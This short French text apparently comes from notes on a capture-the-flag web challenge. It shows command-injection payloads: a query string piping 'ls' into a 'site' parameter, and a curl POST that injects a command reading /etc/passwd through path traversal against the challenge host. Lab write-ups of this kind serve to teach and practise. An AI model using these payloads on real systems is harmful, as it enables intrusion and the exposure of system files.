En fonction du framework, on peut lancer ce type de commande :
?id[]=38 ?site=|ls
Injection de code par requête POST :
curl -d url=|cat ../../../../../../../etc/passwd http://crawlmemaybe.challs.malice.fr/result